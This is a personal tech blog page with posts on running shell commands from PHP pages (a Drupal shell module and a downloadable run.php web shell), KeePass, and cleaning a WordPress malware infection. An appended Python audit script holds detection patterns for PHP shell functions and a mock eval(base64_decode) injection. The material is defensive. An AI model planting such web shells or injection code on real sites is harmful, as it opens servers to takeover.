Run shell commands from PHP pages


Posted by fred | Posted in CMS, Drupal, Linux, Security, tutorial | Posted on 16-02-2012


1. Shell in a Drupal website

A very useful Drupal module that gives you a command line directly in your site:
1. Install the Shell module (it can be downloaded here)
2. Activate the module
3. Logged in as an administrator, go to site.com/shell
4. Run your commands just like in a shell.

Important security note: Restrict the permission to administrators only, and I would recommend disabling the module when you are not using it.


2. On any other PHP site


Here is a simple PHP script to upload to your website (over FTP). Once uploaded, open the page www.mysite.com/run.php and run your commands.

To download the file: http://php-html.net/tutorials/wp-content/uploads/2009/07/simple-run.zip

More information on http://php-html.net/tutorials/how-to-write-a-php-script-to-run-shell-commands-from-browser/

Important security note: Delete the run.php file, or change its extension, when you are not using it!


How to keep all your password safe? #keepass


Posted by fred | Posted in Security, Software | Posted on 15-01-2012


While updating my password database, I realized that, even though it is mentioned in my software list, I had never blogged about KeePass, a tool I have been using for many years to store all my passwords.


According to their website:

KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).


There are a lot of nice features in KeePass, but one I find particularly useful is the file attachment feature. I personally use it to attach the config files of the websites I manage.


When closing a project, I generally create a new database with all the system passwords (master password, database credentials…) and store it along with the project's documents. From experience, this is quite useful, especially for knowledge transfer to the product manager.


For security reasons, I would recommend using both a strong password and a key file as the authentication mechanism, and storing the key file on another medium (a USB key, for instance). Renaming the key file and changing its extension can add some extra security as well. Modify the key file on a regular basis, and don't forget to back it up!


More information on http://keepass.info/


Malware issue on WordPress (and other php) websites


Posted by fred | Posted in Application, Security, Wordpress | Posted on 25-10-2011

I recently noticed that the following hidden links had been added to the bottom of some web pages of one of my websites:

Searching for where this code was generated, I noticed that the following piece of code had been included at the top of almost every PHP file of my website:

Browsing some websites, I found that other webmasters had the same problem on their sites. Here is the best description of the symptoms of this malware:

http://www.marinbezhanov.com/web-development/6/malware-alert-september-2011-sshell-v.1.0/

and here is a PHP script developed by PHP Beginners to clean up all the infected pages (http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html).

If you find the malware on your sites, copy cleaner.php to the root of each of your websites and run it (http://mysite.com/myinfectedsite/cleaner.php).

You should as well find and delete the following files if they exist on your server:

    wp-thumb-creator.php
    b7a.php
    a95b.php

Hopefully this completes the cleanup; last but not least, it is strongly advised to change all your passwords (sites, database and FTP).

I suspect that this malware is coming from one of the WordPress plugins, but I cannot confirm it for the moment. I will keep you posted when I find patient zero.

Good luck!
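Both the first post (a run.php or shell module that must be removed or disabled when not in use) and this one (a block injected at the top of almost every PHP file, plus a few known file names to delete) come down to the same check: walk the web root, find PHP files that hand strings to the system shell, find files whose name is on the known-bad list, and find files that start with the injected block. The script below is an added example written for this page; it is not the blog's own script and not the cleaner.php from PHP Beginners. The injected-code signature (DEMO_SIGNATURE) and the sample web root it builds are constructed for the demo, since the page does not reproduce the real injected snippet; replace the signature with the exact block you find in your own files.

```python
"""Audit a PHP web root for left-behind shell pages and injected code.

Added example for this blog, not the blog's own script and not cleaner.php
from PHP Beginners.  DEMO_SIGNATURE and build_demo_site() are constructed.
"""
import os
import re
import tempfile

# PHP functions that pass a string to the system shell.  A standalone page
# calling one of these is the kind of file the first post says to delete or
# rename when not in use.
SHELL_FUNCS = re.compile(r"\b(shell_exec|system|exec|passthru|popen|proc_open)\s*\(")

# File names the malware post says to find and delete if present.
KNOWN_BAD_NAMES = {"wp-thumb-creator.php", "b7a.php", "a95b.php"}

# Constructed signature for the demo only: a leading <?php block that evals a
# base64 blob.  Replace it with the exact snippet found at the top of your files.
DEMO_SIGNATURE = r"<\?php\s+eval\(base64_decode\('[A-Za-z0-9+/=]+'\)\);\s*\?>\s*"


def iter_php_files(root):
    """Yield every *.php path under root, recursively."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                yield os.path.join(dirpath, name)


def audit(root, injected_signature):
    """Classify PHP files under root.  Returns three sorted lists of relative
    paths: known_bad (by file name), shell_exec (calls a shell function) and
    injected (file starts with the injected block)."""
    sig = re.compile(injected_signature, re.DOTALL)
    findings = {"known_bad": [], "shell_exec": [], "injected": []}
    for path in iter_php_files(root):
        rel = os.path.relpath(path, root).replace(os.sep, "/")
        if os.path.basename(path) in KNOWN_BAD_NAMES:
            findings["known_bad"].append(rel)
        with open(path, encoding="utf-8", errors="replace") as fh:
            content = fh.read()
        if SHELL_FUNCS.search(content):
            findings["shell_exec"].append(rel)
        # match() anchors at offset 0, so only a block at the very top counts,
        # which is where this malware put its code.
        if sig.match(content):
            findings["injected"].append(rel)
    for key in findings:
        findings[key].sort()
    return findings


def clean_file(path, injected_signature):
    """Strip the injected block from the top of one file.  Returns True if the
    file was rewritten, False if the signature was not at its start."""
    sig = re.compile(injected_signature, re.DOTALL)
    with open(path, encoding="utf-8", errors="replace") as fh:
        content = fh.read()
    m = sig.match(content)
    if m is None:
        return False
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(content[m.end():])
    return True


def clean_site(root, injected_signature):
    """Clean every file audit() flags as injected; returns the paths cleaned."""
    cleaned = []
    for rel in audit(root, injected_signature)["injected"]:
        if clean_file(os.path.join(root, rel), injected_signature):
            cleaned.append(rel)
    return cleaned


def build_demo_site():
    """Create a constructed sample web root in a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="php-audit-demo-")
    sample = {
        "index.php": "<?php eval(base64_decode('aGk=')); ?>\n<?php echo 'home'; ?>\n",
        "about.php": "<?php echo 'about'; ?>\n",
        "run.php": "<?php echo shell_exec('uptime'); ?>\n",
        "wp-content/b7a.php": "<?php echo 'x'; ?>\n",
    }
    for rel, body in sample.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    demo = build_demo_site()
    print(audit(demo, DEMO_SIGNATURE))
    print("cleaned:", clean_site(demo, DEMO_SIGNATURE))
    print(audit(demo, DEMO_SIGNATURE))
```

Unlike cleaner.php, this runs from a shell on the server (or over a mounted backup) rather than as a web page, so it does not itself become one more executable page to remember to delete. Run audit() first and review the shell_exec list by hand: a legitimate plugin may call system() for a good reason, so that list is a review queue, not a delete list, whereas the known_bad and injected lists can be acted on directly.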
